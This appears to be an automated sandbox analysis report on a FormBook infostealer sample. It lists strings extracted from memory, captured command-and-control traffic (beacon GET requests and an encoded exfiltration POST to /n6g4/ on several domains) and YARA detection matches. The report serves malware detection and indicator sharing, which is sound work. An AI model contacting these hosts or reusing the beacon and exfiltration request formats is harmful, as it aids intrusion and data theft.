Source: iuvRyl9i7D.exe, 00000000.00000003.249333783.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249250555.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248461189.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248234193.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248399900.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249317666.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249300336.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248498321.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/y
Source: iuvRyl9i7D.exe, 00000000.00000003.256184309.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.monotype.
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehpLMEM
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp4
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpLMEMh
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/de-ch/ocid=iehp
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.msn.com/ocid=iehp
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: control.exe, 00000015.00000002.511522267.00000000052EB000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.uspplongee.com
Source: control.exe, 00000015.00000002.511522267.00000000052EB000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.uspplongee.com/n6g4/
Source: iuvRyl9i7D.exe, 00000000.00000003.247623435.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247629329.0000000005F31000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: iuvRyl9i7D.exe, 00000000.00000003.247623435.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.247629329.0000000005F31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn)
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://xingsen.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://yihen.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://yousu.uspplongee.com/
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://zhanzen.uspplongee.com/
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://consent.google.com/done8continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.goo
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://consent.google.com/hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?g
Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591A
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://consent.google.com/set?pc=s&uxe=4421591LMEM
Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://consent.google.com/setpc=s&uxe=4421591
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=722878611&size=306x271&https=1
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1
Source: control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Press
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com/widget/calloutprid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https%
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4
Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591LMEM(
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/?gws_rd=ssl
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/?gws_rd=sslLMEMh
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngZ
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/favicon.ico
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/gws_rd=ssl
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/LMEMx
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/S
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.htmlstatcb=0&installdataindex=empty&defaultbrowse
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/searchW
Source: control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/searchsource=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3kt
Source: control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
Source: control.exe, 00000015.00000002.509465668.0000000000A4C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/urlsa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQF

Source: unknown

HTTP traffic detected: POST /n6g4/ HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.jamesreadtanusa.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jamesreadtanusa.com/n6g4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 65 3d 63 39 68 48 6f 51 43 67 61 34 4f 30 7a 35 6a 51 43 6a 59 65 32 75 34 6b 41 71 6f 70 66 77 79 34 7e 77 52 67 35 72 35 6c 47 66 36 73 76 36 54 5a 77 5f 54 68 52 30 41 58 6e 58 35 35 42 67 57 6e 73 56 54 49 73 42 6e 57 4f 39 43 4f 34 4b 30 50 48 59 44 61 73 6d 67 57 43 4d 79 48 44 71 67 33 62 6e 6a 56 76 44 44 47 57 64 54 6d 41 4e 52 59 5a 6e 63 7a 34 43 39 38 39 52 54 4c 54 36 6f 55 39 77 48 6a 44 70 59 4f 59 65 75 36 62 67 31 55 79 72 6b 6f 68 70 71 39 59 4c 6d 59 4e 44 69 66 63 44 58 64 6f 4f 4a 33 52 43 4c 64 6f 79 31 4d 78 71 41 2d 73 31 33 43 30 46 71 55 30 6d 78 4b 49 45 78 4f 39 78 58 38 52 6b 78 35 4a 44 72 32 4f 52 6a 56 36 74 63 43 39 4a 6e 4c 44 78 71 66 73 32 75 55 61 6f 61 72 46 59 42 31 46 72 59 50 44 59 42 58 7a 31 69 47 4d 6e 6b 53 49 59 39 37 52 66 61 52 43 42 63 5f 61 74 58 62 72 63 45 74 59 55 6e 4a 42 55 68 35 30 54 6e 66 66 77 44 34 30 6f 41 6c 7e 70 63 7a 41 6b 4d 61 39 66 6e 47 6e 71 7e 6a 42 65 47 53 63 37 45 6b 4d 67 28 75 7e 37 30 62 37 78 48 4d 34 62 79 33 4a 63 68 74 51 48 43 54 56 36 79 75 37 47 62 7a 38 50 70 62 78 6a 56 50 76 56 28 78 36 51 55 46 74 69 70 43 45 44 4b 37 4f 79 6a 78 6f 62 74 52 49 4a 67 48 78 38 6d 64 66 4c 6b 65 43 64 79 73 50 54 38 45 49 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fe=c9hHoQCga4O0z5jQCjYe2u4kAqopfwy4~wRg5r5lGf6sv6TZw_ThR0AXnX55BgWnsVTIsBnWO9CO4K0PHYDasmgWCMyHDqg3bnjVvDDGWdTmANRYZncz4C989RTLT6oU9wHjDpYOYeu6bg1Uyrkohpq9YLmYNDifcDXdoOJ3RCLdoy1MxqA-s13C0FqU0mxKIExO9xX8Rkx5JDr2ORjV6tcC9JnLDxqfs2uUaoarFYB1FrYPDYBXz1iGMnkSIY97RfaRCBc_atXbrcEtYUnJBUh50TnffwD40oAl~pczAkMa9fnGnq~jBeGSc7EkMg(u~70b7xHM4by3JchtQHCTV6yu7Gbz8PpbxjVPvV(x6QUFtipCEDK7OyjxobtRIJgHx8mdfLkeCdysPT8EIg).

Source: unknown

DNS traffic detected: queries for: www.dems-clicks.com

Source: global traffic	HTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qr8bcYtnznV HTTP/1.1Host: www.dems-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n6g4/?3fe=T/V9232RQ/ScvLe6YjNRob4pJIAHZz6ft2oS65luWeOdjKzDide1cQ8VyF5HdhGZwVKQ&r2MLI=tjrDPFcXi HTTP/1.1Host: www.jamesreadtanusa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=WPwjmGPV/4M22m+CqZhMswVRWzk0CJ3SgF5yTNe9lepyZyn4WVCBytWkJrBAR4vfZGHu HTTP/1.1Host: www.kickball.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n6g4/?3fe=er/aW89j3eiO30Tth32zztWhmYSSn5MxbIqpkVj2P1EZBbsuTNG7fFHg+MTirOdy738q&r2MLI=tjrDPFcXi HTTP/1.1Host: www.bldh45.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n6g4/?r2MLI=tjrDPFcXi&3fe=DeftxpR1OWSh4aZAk/LljwybnwLEUT8BN/DlQaDlT4i7MS32eqTj8UaDk/+v6eXHg19D HTTP/1.1Host: www.properscooter.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /n6g4/?3fe=YEAzGNA1BgiQpi8GImtX9JznxcWz/G0oG2K4jwCI3/8B8s5l+/t603YZPdD+BzgPPrJ7&r2MLI=tjrDPFcXi HTTP/1.1Host: www.uspplongee.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.iuvRyl9i7D.exe.2e5276c.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: iuvRyl9i7D.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
